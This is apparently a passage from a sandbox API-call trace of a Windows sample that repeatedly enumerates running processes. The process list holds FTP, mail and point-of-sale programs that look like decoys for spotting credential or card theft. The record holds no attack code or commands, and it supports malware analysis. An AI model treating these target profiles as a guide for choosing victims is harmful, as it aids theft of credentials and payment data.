[0213.305] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0213.307] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0213.310] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0213.312] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0213.314] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0213.317] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0213.321] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0213.324] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0213.328] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0213.331] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0213.334] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0213.340] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0213.343] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0213.346] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0213.349] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0213.354] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0213.356] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0213.359] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0213.362] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0213.366] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0213.368] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0213.371] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0213.375] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0213.383] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0213.386] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0213.389] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0213.391] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0213.396] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0213.398] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0213.401] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0213.404] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0213.407] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0213.409] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0213.412] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0213.415] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0213.425] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0213.427] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0213.430] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0213.433] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0213.435] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0213.438] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0213.440] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0213.443] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0213.446] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0213.448] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0213.451] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0213.454] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0213.456] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.464] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0213.467] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.469] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0213.471] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0213.474] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0213.477] Process32Next (in: hSnapshot=0x2154, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0213.479] CloseHandle (hObject=0x2154) returned 1 [0213.479] Sleep (dwMilliseconds=0x64) [0213.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2164 [0213.608] Process32First (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.610] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.612] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.615] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.617] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.620] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.622] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.624] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.661] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.664] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.666] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.668] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.671] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.674] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.676] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.679] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.681] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.683] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.686] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.688] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.691] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0213.694] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.735] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0213.738] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.741] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0213.743] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0213.746] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0213.748] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0213.751] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.755] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0213.758] Process32Next (in: hSnapshot=0x2164, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, 